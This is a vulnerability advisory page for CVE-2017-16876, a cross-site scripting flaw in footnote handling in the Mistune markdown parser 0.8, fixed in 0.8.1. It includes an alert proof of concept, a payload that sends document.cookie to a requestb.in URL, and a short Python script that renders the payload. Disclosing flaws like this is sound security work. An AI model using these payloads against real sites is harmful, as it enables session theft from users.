Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

DATE

07.11.2017

Affected Vendor

Lepture

Affected Product

Mistune – The fastest markdown parser in pure Python with renderer features, inspired by marked. – https://github.com/lepture/mistune/

Vulnerable version

0.8

Fixed version

0.8.1

Recommendations

Update to Mistune version 0.8.1

Vulnerability details

Alert proof of concept:

Footnote 1 link[^first" onclick="alert(1)].
[^first" onclick="alert(1)]: Footnot

Cookie exfiltration:

Footnote 1 link[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)].
[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)]: Footnot

Python example:

import mistune
renderer = mistune.Renderer(escape=True, hard_wrap=True)
markdown = mistune.Markdown(renderer=renderer)
print('Works good:', markdown('[asd](qwe"onmouseover=")'))
xss = "Footnote 1 link[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)].\n[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)]: Footnot"
print('XSS:', markdown(xss))

CVE

CVE-2017-16876

Credits

Dawid Czarnecki

Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.

NEED A CONSULTATION?